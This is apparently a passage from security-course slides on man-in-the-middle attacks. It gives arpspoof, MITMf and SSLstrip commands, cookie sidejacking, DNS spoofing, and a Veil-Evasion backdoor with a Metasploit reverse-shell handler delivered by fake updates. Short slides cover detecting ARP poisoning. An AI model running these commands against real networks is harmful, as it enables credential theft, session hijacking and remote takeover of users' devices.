  • 7. Man In The Middle Attacks ARP Poisoning ARP main security issues: 1. Each ARP request/response is trusted. 2. Clients can accept responses even if they did not send a request. Requests Responses
  • 8. ● We can exploit theses two issues to redirect the flow of packets in the network. ● We will first send an ARP response to the client telling it that “I am the Router”, this done by telling the client that the device with the router ip address has MY MAC address. Ip:router ip MAC: HACKER MAC “I am the router” ARP Poisoning
  • 9. Then we will send an ARP response to the router this time telling it that “I am the client”, this done by telling the router that the device with the client ip address has MY MAC address. Ip:client ip MAC: HACKER MAC “I am the client” ARP Poisoning
  • 10. Man In The Middle Attacks ARP Poisoning This means that the router thinks that I am the client, and the client thinks that I am the router. So my device is in the middle of the connection between the client and the router, ie:every packet that is going to/from the client will have to go through my device first. Requests Responses
  • 11. ARP Poisoning arpspoof Arpspoof is a tool part of a suit called dsniff, which contains a number of network penetration tools. Arpspoof can be used to launch a MITM attack and redirect traffic to flow through our device. arpspoof -i [interface] -t [Target IP] [AP IP] Ex: arpspoof -i wlan0 -t 192.168.1.5 192.168.1.1 Echo 1 > /proc/sys/net/ipv4/ip_forward 1. Tell the target client that I am the router. 2. Tell the AP that I am the target client. 3. Enable IP forward to allow packets to flow through our device without being dropped. arpspoof -i [interface] -t [AP IP] [Target IP] Ex: arpspoof -i wlan0 -t 192.168.1.1 192.168.1.5
  • 12. ARP Poisoning - MITMf MITMf is a framework that allows us to launch a number of MITM attacks. MITMf also starts SSLstrip automatically to bypass HTTPS/SSL mitmf –arp –spoof -gateway [GATEWAY IP] –targets [TARGET IPs] Ex: Mitmf –arp –spoof -gateway 10.20.14.1 –targets 10.20.14.206 Echo 1 > /proc/sys/net/ipv4/ip_forward
  • 13. Most websites use https in their login pages, this means that these pages are validated using an SSL certificate and there for will show a warning to the user that the certificate is invalid. SSLstrip is a tool that can be used to downgrade HTTPS requests to HTTP allowing us to sniff passwords without displaying a warning to the user. Luckily MITMf starts SSLstrip for us automatically. MITM – bypassing HTTPS
  • 14. Session Hijacking What if the user uses the “remember me” feature ?? If the user uses this feature the authentication happens using the cookies and not the user and password. So instead of sniffing the password we can sniff the cookies and inject them into our browser, this will allow us to login to the user's account without using the password. apt-get install ferret-sidejack hamster ferret -i [INTERFACE]
  • 15. DNS Spoofing allows us to redirect any request to a certain domain to another domain, for example we can redirect any request from live.com to a fake page !! > leafpad /etc/mitmf/mitmf.conf 1. Edit dns settings MITM – DNS Spoofing mitmf –arp –spoof –gateway [GATEWAY IP] –targets [TARGET IP] -i eth0 --dns Ex: mitmf –arp –spoof –gateway [10.20.14.1] –targets [10.20.14.206] -i eth0 --dns 2. Run ettercap to arp poison the target(s) and enable the dns_spoof plugin.
  • 16. MITM Wireshark ● Wireshark is a network protocol analyser that is designed to help network administrators to keep track of what is happening in their network and analyse all the packets. ● Can be used whenever we are the MITM, after ARP spoofing or after starting a fake AP. ● Wireshark logs each packet that flows through the selected interface. Usage: > wireshark
  • 17. Protecting against MITM attacks ● It is very difficult to protect against MITM attacks, this is due to the fact that they exploit the insecure way that ARP works. ● Using static ARP tables can protect against MITM attacks but its not practical in large networks. Even in small networks you have to configure ARP tables every time a new device connects to your network. ● We can discover ARP poisoning easily by only looking at our ARP tables. ● If the MAC address of the router changes then we have been poisoned. > arp -a
  • 18. Protecting against MITM attacks ● There is also tools that would monitor our ARP table automatically and would notify us if anything suspicious happens. ● And we can use wireshark to detect ARP poisoning and other suspicious activities in the network.
  • 19. 1. Create a backdoor. Scenario 2 Hacking clients using a fake update 2. Listen for connections from your backdoor. > msfconsole > use exploit/multi/handler > set PAYLOAD windows/meterpreter/reverse_http > set LPORT 5555 > set LHOST [YOUR IP] > exploit > apt-get install veil-evasion #to install veil-evasion > veil-evasion > use 8 > set LHOST [YOUR IP] > generate
  • 20. Hacking clients using a fake update Using a tool called evil-grade , we can create fake updates and spoof the url that the target program uses to check for updates and get it to redirect to our machine where we have evil grade running, the target program will tell the user that there is a new update available, and when the user agrees to install the new update we will gain full access to their device.
  • 21. Wi-fEye Wi-fEye is a program written in python, designed to help carry out all the attacks that we explained automatically. 1. download it from. Then you need to extract the archive, and run the following command inside its directory: Now you are ready to go ! http://wi-feye.isecur1ty.org/download.php > python install.py > python Wi-fEye.py